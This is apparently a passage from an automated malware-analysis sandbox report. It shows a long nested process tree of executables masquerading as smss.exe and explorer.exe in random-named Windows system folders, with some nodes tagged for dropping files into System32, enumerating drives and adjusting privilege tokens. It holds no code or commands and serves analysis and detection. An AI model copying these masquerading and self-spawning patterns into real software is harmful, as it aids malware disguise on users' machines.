        27⤵
        
        PID:10080
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:10848
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:11772
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:12864
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        32⤵
        
        PID:18100
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        33⤵
        
        PID:25484
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        21⤵
        
        PID:19200
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:16544
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:6700
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:15324
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:17840
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:25348
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:15156
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:17604
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:14796
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:16652
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:19720
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:14036
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:17464
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:12716
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:13940
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:17696
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        
        PID:11540
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Drops file in System32 directory
        
        PID:12708
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:17368
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        
        PID:10536
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:11288
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Drops file in System32 directory
        
        PID:12352
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:13912
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:17536
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:24656
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        12⤵
        
        PID:9528
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:9912
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:11040
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Drops file in System32 directory
        
        PID:12112
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:13536
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:14468
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:18160
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:24928
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1288
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4440
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2816
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        Executes dropped EXE
        
        PID:4752
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:1964
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:5904
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:6128
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        Drops file in System32 directory
        
        PID:6908
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:6648
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:7288
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:7824
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:7940
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        Enumerates connected drives
        
        PID:8560
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:9032
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:9236
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:10964
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:11952
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:13108
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:13388
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        32⤵
        
        PID:17680
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        22⤵
        
        PID:25832
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        21⤵
        
        PID:19312
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:25824
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:16736
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:18048
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:24616
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:15188
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:16956
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:23528
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:14836
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17720
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:14168
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:17248
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        
        PID:12824
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:17736
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        
        PID:11728
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:12832
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:17528
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:24636
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        
        PID:10456
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Enumerates connected drives
        
        PID:5260
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:13860
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:14740
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:18200
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        12⤵
        
        PID:9520
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:9876
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Drops file in System32 directory
        
        PID:5076
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:12072
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:13512
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:14436
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17340
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        11⤵
        Drops file in System32 directory
        
        PID:8228
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:9192
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:9832
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Drops file in System32 directory
        
        PID:10508
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        Drops file in System32 directory
        
        PID:12332
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:13896
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:14756
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:18116
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:25324
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3232
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:1308
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:1296
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:5648
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:6364
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:6252
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:7088
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:7628
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:7344
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:8364
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:8708
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:10004
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:10780
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:11668
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:12872
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:100
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:17636
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:19088
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:7240
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:19432
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:15100
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:17768
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:15124
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17596
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        Enumerates connected drives
        
        PID:14764
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:16712
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        
        PID:13944
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:17760
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        
        PID:12412
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:13952
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:6952
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:6628
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        
        PID:11372
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:12472
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:14112
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:17444
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        12⤵
        
        PID:10448
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:5244
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Drops file in System32 directory
        
        PID:13816
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:14724
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:16748
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:19608
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        11⤵
        
        PID:9472
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        Drops file in System32 directory
        
        PID:9412
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:4324
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:12032
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:13480
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:14408
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:17436
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        10⤵
        Drops file in System32 directory
        
        PID:4084
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        Enumerates connected drives
        
        PID:9120
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:9760
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:10408
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Drops file in System32 directory
        
        PID:1084
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:12324
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:13852
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:14748
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17452
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3336
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2480
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:856
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4644
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2820
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        Drops file in System32 directory
        
        PID:6064
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:6404
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
